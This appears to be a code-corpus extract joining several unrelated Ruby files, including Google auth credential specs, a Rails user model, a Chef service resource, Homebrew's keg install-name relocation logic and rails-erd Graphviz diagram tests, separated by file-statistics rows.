mocked_signet = mock_signet
allow(Google::Auth::ServiceAccountCredentials).to receive(:make_creds) do |options|
expect(options[:token_credential_uri]).to eq("https://oauth2.googleapis.com/token")
expect(options[:audience]).to eq("https://oauth2.googleapis.com/token")
expect(options[:scope]).to eq(["http://example.com/scope"])
expect(options[:enable_self_signed_jwt]).to be_nil
expect(options[:target_audience]).to be_nil
expect(options[:json_key_io].read).to eq(test_json_env_val)
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials3.default
expect(creds).to be_a_kind_of(TestCredentials3)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "subclasses can use DEFAULT_PATHS to get keyfile path" do
class TestCredentials4 < Google::Auth::Credentials
SCOPE = "http://example.com/scope".freeze
PATH_ENV_VARS = ["PATH_ENV_DUMMY"].freeze
JSON_ENV_VARS = ["JSON_ENV_DUMMY"].freeze
DEFAULT_PATHS = ["~/default/path/to/file.txt"].freeze
end
json_content = JSON.generate default_keyfile_hash
allow(::ENV).to receive(:[]).with("GOOGLE_AUTH_SUPPRESS_CREDENTIALS_WARNINGS") { "true" }
allow(::ENV).to receive(:[]).with("PATH_ENV_DUMMY") { "/fake/path/to/file.txt" }
allow(::File).to receive(:file?).with("/fake/path/to/file.txt") { false }
allow(::ENV).to receive(:[]).with("JSON_ENV_DUMMY") { nil }
allow(::File).to receive(:file?).with("~/default/path/to/file.txt") { true }
allow(::File).to receive(:read).with("~/default/path/to/file.txt") { json_content }
mocked_signet = mock_signet
allow(Google::Auth::ServiceAccountCredentials).to receive(:make_creds) do |options|
expect(options[:token_credential_uri]).to eq("https://oauth2.googleapis.com/token")
expect(options[:audience]).to eq("https://oauth2.googleapis.com/token")
expect(options[:scope]).to eq(["http://example.com/scope"])
expect(options[:enable_self_signed_jwt]).to be_nil
expect(options[:target_audience]).to be_nil
expect(options[:json_key_io].read).to eq(json_content)
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials4.default
expect(creds).to be_a_kind_of(TestCredentials4)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "subclasses that find no matches default to Google::Auth.get_application_default" do
class TestCredentials5 < Google::Auth::Credentials
SCOPE = "http://example.com/scope".freeze
PATH_ENV_VARS = ["PATH_ENV_DUMMY"].freeze
JSON_ENV_VARS = ["JSON_ENV_DUMMY"].freeze
DEFAULT_PATHS = ["~/default/path/to/file.txt"].freeze
end
allow(::ENV).to receive(:[]).with("GOOGLE_AUTH_SUPPRESS_CREDENTIALS_WARNINGS") { "true" }
allow(::ENV).to receive(:[]).with("PATH_ENV_DUMMY") { "/fake/path/to/file.txt" }
allow(::File).to receive(:file?).with("/fake/path/to/file.txt") { false }
allow(::ENV).to receive(:[]).with("JSON_ENV_DUMMY") { nil }
allow(::File).to receive(:file?).with("~/default/path/to/file.txt") { false }
mocked_signet = mock_signet
allow(Google::Auth).to receive(:get_application_default) do |scope, options|
expect(scope).to eq([TestCredentials5::SCOPE])
expect(options[:enable_self_signed_jwt]).to be_nil
expect(options[:token_credential_uri]).to eq("https://oauth2.googleapis.com/token")
expect(options[:audience]).to eq("https://oauth2.googleapis.com/token")
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials5.default
expect(creds).to be_a_kind_of(TestCredentials5)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "can be subclassed to pass in other env paths" do
class TestCredentials6 < Google::Auth::Credentials
TOKEN_CREDENTIAL_URI = "https://example.com/token".freeze
AUDIENCE = "https://example.com/audience".freeze
SCOPE = "http://example.com/scope".freeze
PATH_ENV_VARS = ["TEST_PATH"].freeze
JSON_ENV_VARS = ["TEST_JSON_VARS"].freeze
DEFAULT_PATHS = ["~/default/path/to/file.txt"]
end
class TestCredentials7 < TestCredentials6
end
expect(TestCredentials7.token_credential_uri).to eq("https://example.com/token")
expect(TestCredentials7.audience).to eq("https://example.com/audience")
expect(TestCredentials7.scope).to eq(["http://example.com/scope"])
expect(TestCredentials7.env_vars).to eq(["TEST_PATH", "TEST_JSON_VARS"])
expect(TestCredentials7.paths).to eq(["~/default/path/to/file.txt"])
TestCredentials7::TOKEN_CREDENTIAL_URI = "https://example.com/token2"
expect(TestCredentials7.token_credential_uri).to eq("https://example.com/token2")
TestCredentials7::AUDIENCE = nil
expect(TestCredentials7.audience).to eq("https://example.com/audience")
end
end
describe "using class methods" do
it "can be subclassed to pass in other env paths" do
test_path_env_val = "/unknown/path/to/file.txt".freeze
test_json_env_val = JSON.generate default_keyfile_hash
ENV["TEST_PATH"] = test_path_env_val
ENV["TEST_JSON_VARS"] = test_json_env_val
class TestCredentials11 < Google::Auth::Credentials
self.token_credential_uri = "https://example.com/token"
self.audience = "https://example.com/audience"
self.scope = "http://example.com/scope"
self.env_vars = ["TEST_PATH", "TEST_JSON_VARS"]
end
allow(::File).to receive(:file?).with(test_path_env_val) { false }
allow(::File).to receive(:file?).with(test_json_env_val) { false }
mocked_signet = mock_signet
allow(Google::Auth::ServiceAccountCredentials).to receive(:make_creds) do |options|
expect(options[:token_credential_uri]).to eq("https://example.com/token")
expect(options[:audience]).to eq("https://example.com/audience")
expect(options[:scope]).to eq(["http://example.com/scope"])
expect(options[:enable_self_signed_jwt]).to be_nil
expect(options[:target_audience]).to be_nil
expect(options[:json_key_io].read).to eq(test_json_env_val)
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials11.default
expect(creds).to be_a_kind_of(TestCredentials11)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "subclasses can use PATH_ENV_VARS to get keyfile path" do
class TestCredentials12 < Google::Auth::Credentials
self.scope = "http://example.com/scope"
self.env_vars = %w[PATH_ENV_DUMMY PATH_ENV_TEST JSON_ENV_DUMMY]
self.paths = ["~/default/path/to/file.txt"]
end
json_content = JSON.generate default_keyfile_hash
allow(::ENV).to receive(:[]).with("GOOGLE_AUTH_SUPPRESS_CREDENTIALS_WARNINGS") { "true" }
allow(::ENV).to receive(:[]).with("PATH_ENV_DUMMY") { "/fake/path/to/file.txt" }
allow(::File).to receive(:file?).with("/fake/path/to/file.txt") { false }
allow(::ENV).to receive(:[]).with("PATH_ENV_TEST") { "/unknown/path/to/file.txt" }
allow(::File).to receive(:file?).with("/unknown/path/to/file.txt") { true }
allow(::File).to receive(:read).with("/unknown/path/to/file.txt") { json_content }
mocked_signet = mock_signet
allow(Google::Auth::ServiceAccountCredentials).to receive(:make_creds) do |options|
expect(options[:token_credential_uri]).to eq("https://oauth2.googleapis.com/token")
expect(options[:audience]).to eq("https://oauth2.googleapis.com/token")
expect(options[:scope]).to eq(["http://example.com/scope"])
expect(options[:enable_self_signed_jwt]).to be_nil
expect(options[:target_audience]).to be_nil
expect(options[:json_key_io].read).to eq(json_content)
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials12.default
expect(creds).to be_a_kind_of(TestCredentials12)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "subclasses can use JSON_ENV_VARS to get keyfile contents" do
test_json_env_val = JSON.generate default_keyfile_hash
class TestCredentials13 < Google::Auth::Credentials
self.scope = "http://example.com/scope"
self.env_vars = %w[PATH_ENV_DUMMY JSON_ENV_DUMMY JSON_ENV_TEST]
self.paths = ["~/default/path/to/file.txt"]
end
allow(::ENV).to receive(:[]).with("GOOGLE_AUTH_SUPPRESS_CREDENTIALS_WARNINGS") { "true" }
allow(::ENV).to receive(:[]).with("PATH_ENV_DUMMY") { "/fake/path/to/file.txt" }
allow(::File).to receive(:file?).with("/fake/path/to/file.txt") { false }
allow(::File).to receive(:file?).with(test_json_env_val) { false }
allow(::ENV).to receive(:[]).with("JSON_ENV_DUMMY") { nil }
allow(::ENV).to receive(:[]).with("JSON_ENV_TEST") { test_json_env_val }
mocked_signet = mock_signet
allow(Google::Auth::ServiceAccountCredentials).to receive(:make_creds) do |options|
expect(options[:token_credential_uri]).to eq("https://oauth2.googleapis.com/token")
expect(options[:audience]).to eq("https://oauth2.googleapis.com/token")
expect(options[:scope]).to eq(["http://example.com/scope"])
expect(options[:enable_self_signed_jwt]).to be_nil
expect(options[:target_audience]).to be_nil
expect(options[:json_key_io].read).to eq(test_json_env_val)
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials13.default
expect(creds).to be_a_kind_of(TestCredentials13)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "subclasses can use DEFAULT_PATHS to get keyfile path" do
class TestCredentials14 < Google::Auth::Credentials
self.scope = "http://example.com/scope"
self.env_vars = %w[PATH_ENV_DUMMY JSON_ENV_DUMMY]
self.paths = ["~/default/path/to/file.txt"]
end
json_content = JSON.generate default_keyfile_hash
allow(::ENV).to receive(:[]).with("GOOGLE_AUTH_SUPPRESS_CREDENTIALS_WARNINGS") { "true" }
allow(::ENV).to receive(:[]).with("PATH_ENV_DUMMY") { "/fake/path/to/file.txt" }
allow(::File).to receive(:file?).with("/fake/path/to/file.txt") { false }
allow(::ENV).to receive(:[]).with("JSON_ENV_DUMMY") { nil }
allow(::File).to receive(:file?).with("~/default/path/to/file.txt") { true }
allow(::File).to receive(:read).with("~/default/path/to/file.txt") { json_content }
mocked_signet = mock_signet
allow(Google::Auth::ServiceAccountCredentials).to receive(:make_creds) do |options|
expect(options[:token_credential_uri]).to eq("https://oauth2.googleapis.com/token")
expect(options[:audience]).to eq("https://oauth2.googleapis.com/token")
expect(options[:scope]).to eq(["http://example.com/scope"])
expect(options[:enable_self_signed_jwt]).to be_nil
expect(options[:target_audience]).to be_nil
expect(options[:json_key_io].read).to eq(json_content)
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials14.default
expect(creds).to be_a_kind_of(TestCredentials14)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "subclasses that find no matches default to Google::Auth.get_application_default with self-signed jwt enabled" do
class TestCredentials15 < Google::Auth::Credentials
self.scope = "http://example.com/scope"
self.env_vars = %w[PATH_ENV_DUMMY JSON_ENV_DUMMY]
self.paths = ["~/default/path/to/file.txt"]
end
allow(::ENV).to receive(:[]).with("GOOGLE_AUTH_SUPPRESS_CREDENTIALS_WARNINGS") { "true" }
allow(::ENV).to receive(:[]).with("PATH_ENV_DUMMY") { "/fake/path/to/file.txt" }
allow(::File).to receive(:file?).with("/fake/path/to/file.txt") { false }
allow(::ENV).to receive(:[]).with("JSON_ENV_DUMMY") { nil }
allow(::File).to receive(:file?).with("~/default/path/to/file.txt") { false }
mocked_signet = mock_signet
allow(Google::Auth).to receive(:get_application_default) do |scope, options|
expect(scope).to eq(TestCredentials15.scope)
expect(options[:enable_self_signed_jwt]).to eq(true)
expect(options[:token_credential_uri]).to eq("https://oauth2.googleapis.com/token")
expect(options[:audience]).to eq("https://oauth2.googleapis.com/token")
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials15.default enable_self_signed_jwt: true
expect(creds).to be_a_kind_of(TestCredentials15)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "subclasses that find no matches default to Google::Auth.get_application_default with self-signed jwt disabled" do
class TestCredentials16 < Google::Auth::Credentials
self.scope = "http://example.com/scope"
self.env_vars = %w[PATH_ENV_DUMMY JSON_ENV_DUMMY]
self.paths = ["~/default/path/to/file.txt"]
end
allow(::ENV).to receive(:[]).with("GOOGLE_AUTH_SUPPRESS_CREDENTIALS_WARNINGS") { "true" }
allow(::ENV).to receive(:[]).with("PATH_ENV_DUMMY") { "/fake/path/to/file.txt" }
allow(::File).to receive(:file?).with("/fake/path/to/file.txt") { false }
allow(::ENV).to receive(:[]).with("JSON_ENV_DUMMY") { nil }
allow(::File).to receive(:file?).with("~/default/path/to/file.txt") { false }
mocked_signet = mock_signet
allow(Google::Auth).to receive(:get_application_default) do |scope, options|
expect(scope).to eq(TestCredentials16.scope)
expect(options[:enable_self_signed_jwt]).to be_nil
expect(options[:token_credential_uri]).to eq("https://oauth2.googleapis.com/token")
expect(options[:audience]).to eq("https://oauth2.googleapis.com/token")
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials16.default
expect(creds).to be_a_kind_of(TestCredentials16)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "subclasses that find no matches default to Google::Auth.get_application_default with custom values" do
scope2 = "http://example.com/scope2"
class TestCredentials17 < Google::Auth::Credentials
self.scope = "http://example.com/scope"
self.env_vars = %w[PATH_ENV_DUMMY JSON_ENV_DUMMY]
self.paths = ["~/default/path/to/file.txt"]
self.token_credential_uri = "https://example.com/token2"
self.audience = "https://example.com/token3"
end
allow(::ENV).to receive(:[]).with("GOOGLE_AUTH_SUPPRESS_CREDENTIALS_WARNINGS") { "true" }
allow(::ENV).to receive(:[]).with("PATH_ENV_DUMMY") { "/fake/path/to/file.txt" }
allow(::File).to receive(:file?).with("/fake/path/to/file.txt") { false }
allow(::ENV).to receive(:[]).with("JSON_ENV_DUMMY") { nil }
allow(::File).to receive(:file?).with("~/default/path/to/file.txt") { false }
mocked_signet = mock_signet
allow(Google::Auth).to receive(:get_application_default) do |scope, options|
expect(scope).to eq(scope2)
expect(options[:enable_self_signed_jwt]).to eq(false)
expect(options[:token_credential_uri]).to eq("https://example.com/token2")
expect(options[:audience]).to eq("https://example.com/token3")
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials17.default scope: scope2, enable_self_signed_jwt: true
expect(creds).to be_a_kind_of(TestCredentials17)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "subclasses delegate up the class hierarchy" do
class TestCredentials18 < Google::Auth::Credentials
self.scope = "http://example.com/scope"
self.target_audience = "https://example.com/target_audience"
self.env_vars = ["TEST_PATH", "TEST_JSON_VARS"]
self.paths = ["~/default/path/to/file.txt"]
end
class TestCredentials19 < TestCredentials18
end
expect(TestCredentials19.scope).to eq(["http://example.com/scope"])
expect(TestCredentials19.target_audience).to eq("https://example.com/target_audience")
expect(TestCredentials19.env_vars).to eq(["TEST_PATH", "TEST_JSON_VARS"])
expect(TestCredentials19.paths).to eq(["~/default/path/to/file.txt"])
TestCredentials19.token_credential_uri = "https://example.com/token2"
expect(TestCredentials19.token_credential_uri).to eq("https://example.com/token2")
TestCredentials19.token_credential_uri = nil
expect(TestCredentials19.token_credential_uri).to eq("https://oauth2.googleapis.com/token")
end
end
it "warns when cloud sdk credentials are used" do
mocked_signet = double "Signet::OAuth2::Client"
allow(mocked_signet).to receive(:configure_connection).and_return(mocked_signet)
allow(mocked_signet).to receive(:needs_access_token?).and_return(true)
allow(mocked_signet).to receive(:fetch_access_token!).and_return(true)
allow(Signet::OAuth2::Client).to receive(:new) do |_options|
mocked_signet
end
allow(mocked_signet).to receive(:client_id).and_return(Google::Auth::CredentialsLoader::CLOUD_SDK_CLIENT_ID)
expect { Google::Auth::Credentials.new default_keyfile_hash }.to output(
Google::Auth::CredentialsLoader::CLOUD_SDK_CREDENTIALS_WARNING + "\n"
).to_stderr
end
it "does not fetch access token when initialized with a Signet::OAuth2::Client object that already has a token" do
signet = Signet::OAuth2::Client.new access_token: token # Client#needs_access_token? will return false
creds = Google::Auth::Credentials.new signet
expect(creds.client).to eq(signet)
end
end
| 48.552941 | 537 | 0.69272 |
26945a8f2334d2a10c21a5b5a1e237839d2b4eff | 2,868 | # == Schema Information
#
# Table name: users
#
# id :integer not null, primary key
# access_state :string(255)
# activation_state :string(255)
# activation_token :string(255)
# activation_token_expires_at :datetime
# crypted_password :string(255)
# deleted_at :datetime
# email :string(255) not null
# language :string
# last_activity_at :datetime
# last_login_at :datetime
# last_login_from_ip_address :string(255)
# last_logout_at :datetime
# remember_me_token :string(255)
# remember_me_token_expires_at :datetime
# reset_password_email_sent_at :datetime
# reset_password_token :string(255)
# reset_password_token_expires_at :datetime
# salt :string(255)
# created_at :datetime
# updated_at :datetime
#
# Indexes
#
# index_users_on_activation_token (activation_token)
# index_users_on_email (email) UNIQUE
# index_users_on_last_login_at (last_login_at)
# index_users_on_remember_me_token (remember_me_token)
# index_users_on_reset_password_token (reset_password_token)
#
class User < ApplicationRecord
authenticates_with_sorcery!
validates :password, confirmation: true, length: { minimum: 6 }, on: :create
validates :password, confirmation: true, length: { minimum: 6 }, on: :update, if: :password?
validates :email, presence: true, uniqueness: true
validate do
errors.add(:email, :postmaster) if email && email[/postmaster/]
end
before_validation :downcase_email
def activated?
activation_state == "active"
end
def activation_pending?
activation_state == "pending"
end
def password?
password.present?
end
def send_activation_needed_email!
Authentication::MailerWorker.perform_async(:activation_needed,
[email, activation_token, language])
end
def send_activation_success_email!
Authentication::MailerWorker.perform_async(:activation_success, email)
end
def send_reset_password_email!
Authentication::MailerWorker.perform_async(:reset_password,
[email, reset_password_token])
end
def last_login_from_ip_address=(arg)
# stub
end
def downcase_email
unless self.email.nil?
email.downcase!
email.gsub!(/\(.*\)/){|comment| ''}
email.gsub!(%r(^[a-zA-Z0-9!\#$%&'*+-\/=?^_`\{\}~.@|]), '')
end
end
def self.delete_pending_users
transaction do
where("created_at < ? and activation_state = 'pending'",
Date.today - Authentication.delete_after).each(&:destroy)
end
end
end
| 31.516484 | 94 | 0.624128 |
11603e8423d57d153195ca3b1ac2772bbaf96da4 | 121 | class AddlowaccountToUsers < ActiveRecord::Migration
def change
add_column :users, :low_account, :string
end
end
| 20.166667 | 52 | 0.768595 |
bbb035a491164a66522d6831fee0ecf73f1b1c99 | 41 | module Fabricate
VERSION = "0.0.1"
end
| 10.25 | 19 | 0.682927 |
39796f0d998df2b8e264ad9e19a1187cd3d1dbfc | 1,324 | module AnchorCookbook
class AnchorServiceManagerUpstart < AnchorServiceBase
use_automatic_resource_name
provides :anchor_service, platform: 'ubuntu'
property :anchor_home, String, default: '/opt/anchor/current'
property :anchor_venv, String, default: '/opt/anchor/.venv'
property :username, String, default: 'anchor'
property :groupname, String, default: 'anchor'
action :start do
package 'uwsgi-plugin-python3'
template '/etc/init/anchor.conf' do
source 'upstart/anchor.conf.erb'
owner 'root'
group 'root'
mode '0644'
cookbook 'anchor'
variables(
anchor_python_home: new_resource.anchor_home,
anchor_virtualenv: new_resource.anchor_venv,
anchor_user: new_resource.username,
anchor_group: new_resource.groupname
)
action :create
notifies :restart, 'service[anchor]'
end
service 'anchor' do
provider Chef::Provider::Service::Upstart
ignore_failure true
action :start
end
end
action :stop do
service 'anchor' do
provider Chef::Provider::Service::Upstart
supports status: true
action :stop
end
end
action :restart do
action_stop
action_start
end
end
end
| 25.461538 | 65 | 0.641994 |
bff97842ce578fbd3da5faadddea93d5bf305f0e | 6,319 | class Keg
def fix_install_names options={}
mach_o_files.each do |file|
install_names_for(file, options) do |id, bad_names|
file.ensure_writable do
install_name_tool("-id", id, file) if file.dylib?
bad_names.each do |bad_name|
new_name = fixed_name(file, bad_name)
unless new_name == bad_name
install_name_tool("-change", bad_name, new_name, file)
end
end
end
end
end
end
def relocate_install_names old_prefix, new_prefix, old_cellar, new_cellar, options={}
mach_o_files.each do |file|
install_names_for(file, options, relocate_reject_proc(old_prefix)) do |id, old_prefix_names|
file.ensure_writable do
new_prefix_id = id.to_s.gsub old_prefix, new_prefix
install_name_tool("-id", new_prefix_id, file) if file.dylib?
old_prefix_names.each do |old_prefix_name|
new_prefix_name = old_prefix_name.to_s.gsub old_prefix, new_prefix
install_name_tool("-change", old_prefix_name, new_prefix_name, file)
end
end
end
install_names_for(file, options, relocate_reject_proc(old_cellar)) do |id, old_cellar_names|
file.ensure_writable do
old_cellar_names.each do |old_cellar_name|
new_cellar_name = old_cellar_name.to_s.gsub old_cellar, new_cellar
install_name_tool("-change", old_cellar_name, new_cellar_name, file)
end
end
end
end
# Search for pkgconfig .pc files and relocate references to the cellar
old_cellar = HOMEBREW_CELLAR if old_cellar == :any
old_prefix = HOMEBREW_PREFIX if old_prefix == :any
old_cellar = Regexp.escape(old_cellar)
old_prefix = Regexp.escape(old_prefix)
pkgconfig_files.each do |pcfile|
pcfile.ensure_writable do
pcfile.open('rb') do |f|
s = f.read
# These regexes match lines of the form: prefix=/usr/local/Cellar/foo/1.2.3/lib
# and (assuming new_cellar is "/tmp") transform them into: prefix="/tmp/foo/1.2.3/lib"
# If the original line did not have quotes, we add them in automatically
s.gsub!(%r[([\S]+)="?#{old_cellar}(.*?)"?$], "\\1=\"#{new_cellar}\\2\"")
s.gsub!(%r[([\S]+)="?#{old_prefix}(.*?)"?$], "\\1=\"#{new_prefix}\\2\"")
f.reopen(pcfile, 'wb')
f.write(s)
end
end
end
end
# Detects the C++ dynamic libraries in place, scanning the dynamic links
# of the files within the keg. This searches only libs contained within
# lib/, and ignores binaries and other mach-o objects
# Note that this doesn't attempt to distinguish between libstdc++ versions,
# for instance between Apple libstdc++ and GNU libstdc++
def detect_cxx_stdlibs
results = Set.new
mach_o_files.each do |file|
dylibs = file.dynamically_linked_libraries
results << :libcxx unless dylibs.grep(/libc\+\+.+\.dylib/).empty?
results << :libstdcxx unless dylibs.grep(/libstdc\+\+.+\.dylib/).empty?
end
results.to_a
end
private
OTOOL_RX = /\t(.*) \(compatibility version (\d+\.)*\d+, current version (\d+\.)*\d+\)/
def install_name_tool(*args)
system(MacOS.locate("install_name_tool"), *args)
end
# If file is a dylib or bundle itself, look for the dylib named by
# bad_name relative to the lib directory, so that we can skip the more
# expensive recursive search if possible.
def fixed_name(file, bad_name)
if (file.dylib? || file.mach_o_bundle?) && (file.parent + bad_name).exist?
"@loader_path/#{bad_name}"
elsif file.mach_o_executable? && (lib + bad_name).exist?
"#{lib}/#{bad_name}"
elsif (abs_name = find_dylib(Pathname.new(bad_name).basename)) && abs_name.exist?
abs_name.to_s
else
opoo "Could not fix #{bad_name} in #{file}"
bad_name
end
end
def lib; join 'lib' end
def default_reject_proc
Proc.new do |fn|
# Don't fix absolute paths unless they are rooted in the build directory
tmp = ENV['HOMEBREW_TEMP'] ? Regexp.escape(ENV['HOMEBREW_TEMP']) : '/tmp'
fn[0,1] == '/' and not %r[^#{tmp}] === fn
end
end
def relocate_reject_proc(path)
Proc.new { |fn| not fn.start_with?(path) }
end
def install_names_for file, options, reject_proc=default_reject_proc
ENV['HOMEBREW_MACH_O_FILE'] = file.to_s # solves all shell escaping problems
install_names = `#{MacOS.locate("otool")} -L "$HOMEBREW_MACH_O_FILE"`.split "\n"
install_names.shift # first line is fluff
install_names.map!{ |s| OTOOL_RX =~ s && $1 }
# Bundles and executables do not have an ID
id = install_names.shift if file.dylib?
install_names.compact!
install_names.reject!{ |fn| fn =~ /^@(loader_|executable_|r)path/ }
install_names.reject!{ |fn| reject_proc.call(fn) }
# the shortpath ensures that library upgrades don’t break installed tools
relative_path = Pathname.new(file).relative_path_from(self)
shortpath = HOMEBREW_PREFIX.join(relative_path)
id = if shortpath.exist? and not options[:keg_only]
shortpath
else
"#{HOMEBREW_PREFIX}/opt/#{fname}/#{relative_path}"
end
yield id, install_names
end
def find_dylib name
(join 'lib').find do |pn|
break pn if pn.basename == Pathname.new(name)
end
end
def mach_o_files
mach_o_files = []
dirs = %w{bin lib Frameworks}
dirs.map! { |dir| join(dir) }
dirs.reject! { |dir| not dir.directory? }
dirs.each do |dir|
dir.find do |pn|
next if pn.symlink? or pn.directory?
mach_o_files << pn if pn.dylib? or pn.mach_o_bundle? or pn.mach_o_executable?
end
end
mach_o_files
end
def pkgconfig_files
pkgconfig_files = []
# find .pc files, which are stored in lib/pkgconfig
pc_dir = self/'lib/pkgconfig'
if pc_dir.directory?
pc_dir.find do |pn|
next if pn.symlink? or pn.directory? or pn.extname.to_s != '.pc'
pkgconfig_files << pn
end
end
# find name-config scripts, which can be all over the keg
Pathname.new(self).find do |pn|
next if pn.symlink? or pn.directory?
pkgconfig_files << pn if pn.text_executable? and pn.basename.to_s.end_with? '-config'
end
pkgconfig_files
end
end
| 33.433862 | 98 | 0.651685 |
d588e4d94c561d9878def97dc241b62c13e2626e | 16,662 | require File.expand_path("../test_helper", File.dirname(__FILE__))
require "rails_erd/diagram/graphviz"
class GraphvizTest < ActiveSupport::TestCase
def setup
RailsERD.options.filetype = :png
RailsERD.options.warn = false
end
def teardown
FileUtils.rm Dir["erd*.*"] rescue nil
end
def diagram(options = {})
@diagram ||= Diagram::Graphviz.new(Domain.generate(options), options).tap do |diagram|
diagram.generate
end
end
def find_dot_nodes(diagram)
[].tap do |nodes|
diagram.graph.each_node do |name, node|
nodes << node
end
end
end
def find_dot_node(diagram, name)
diagram.graph.get_node(name)
end
def find_dot_node_pairs(diagram)
[].tap do |edges|
diagram.graph.each_edge do |edge|
edges << [edge.node_one, edge.node_two]
end
end
end
def find_dot_edges(diagram)
[].tap do |edges|
diagram.graph.each_edge do |edge|
edges << edge
end
end
end
def find_dot_edge_styles(diagram)
find_dot_edges(diagram).map { |e| [e[:arrowtail].to_s.tr('"', ''), e[:arrowhead].to_s.tr('"', '')] }
end
# Diagram properties =======================================================
test "file name should depend on file type" do
create_simple_domain
begin
assert_equal "erd.svg", Diagram::Graphviz.create(:filetype => :svg)
ensure
FileUtils.rm "erd.svg" rescue nil
end
end
test "rank direction should be tb for horizontal orientation" do
create_simple_domain
assert_equal '"TB"', diagram(:orientation => "horizontal").graph[:rankdir].to_s
end
test "rank direction should be lr for vertical orientation" do
create_simple_domain
assert_equal '"LR"', diagram(:orientation => "vertical").graph[:rankdir].to_s
end
# Diagram generation =======================================================
test "create should create output for domain with attributes" do
create_model "Foo", :bar => :references, :column => :string do
belongs_to :bar
end
create_model "Bar", :column => :string
Diagram.any_instance.expects(:save)
Diagram::Graphviz.create
end
test "create should create output for domain without attributes" do
create_simple_domain
Diagram.any_instance.expects(:save)
Diagram::Graphviz.create
end
test "create should write to file with dot extension if type is dot" do
create_simple_domain
Diagram.any_instance.expects(:save)
Diagram::Graphviz.create(:filetype => :dot)
end
test "create should create output for filenames that have spaces" do
create_simple_domain
Diagram.any_instance.expects(:save)
Diagram::Graphviz.create(:filename => "erd with spaces")
end
test "create should write to file with dot extension without requiring graphviz" do
create_simple_domain
begin
GraphViz.class_eval do
alias_method :old_output_and_errors_from_command, :output_and_errors_from_command
undef :output_and_errors_from_command
def output_and_errors_from_command(*args); raise end
end
assert_nothing_raised do
Diagram::Graphviz.create(:filetype => :dot)
end
ensure
GraphViz.class_eval do
undef :output_and_errors_from_command
alias_method :output_and_errors_from_command, :old_output_and_errors_from_command
end
end
end
test "create should create output for domain with attributes if orientation is vertical" do
create_model "Foo", :bar => :references, :column => :string do
belongs_to :bar
end
create_model "Bar", :column => :string
Diagram.any_instance.expects(:save)
Diagram::Graphviz.create(:orientation => :vertical)
end
test "create should create output for domain if orientation is vertical" do
create_simple_domain
Diagram.any_instance.expects(:save)
Diagram::Graphviz.create(:orientation => :vertical)
end
test "create should not create output if there are no connected models" do
Diagram::Graphviz.create rescue nil
assert !File.exist?("erd.png")
end
test "create should abort and complain if there are no connected models" do
message = nil
begin
Diagram::Graphviz.create
rescue => e
message = e.message
end
assert_match(/No entities found/, message)
end
test "create should abort and complain if output directory does not exist" do
message = nil
begin
create_simple_domain
Diagram::Graphviz.create(:filename => "does_not_exist/foo")
rescue => e
message = e.message
end
assert_match(/Output directory 'does_not_exist' does not exist/, message)
end
test "create should not fail when reserved words are used as node names" do
create_model "Node", :name => :string
create_model "Edge", :node => :references do
belongs_to :node
end
assert_nothing_raised do
Diagram::Graphviz.create
end
end
# Graphviz output ==========================================================
test "generate should create directed graph" do
create_simple_domain
assert_equal "digraph", diagram.graph.type
end
test "generate should add title to graph" do
create_simple_domain
assert_equal '"Domain model\n\n"', diagram.graph.graph[:label].to_s
end
test "generate should add default value for splines attribute" do
create_simple_domain
assert_equal '"spline"', diagram.graph.graph[:splines].to_s
end
test "generate should add set value for splines attribute" do
create_simple_domain
assert_equal '"ortho"', diagram(splines: 'ortho').graph.graph[:splines].to_s
end
test "generate should add title with application name to graph" do
begin
Object::Quux = Module.new
Object::Quux::Application = Class.new
Object::Rails = Struct.new(:application).new(Object::Quux::Application.new)
create_simple_domain
assert_equal '"Quux domain model\n\n"', diagram.graph.graph[:label].to_s
ensure
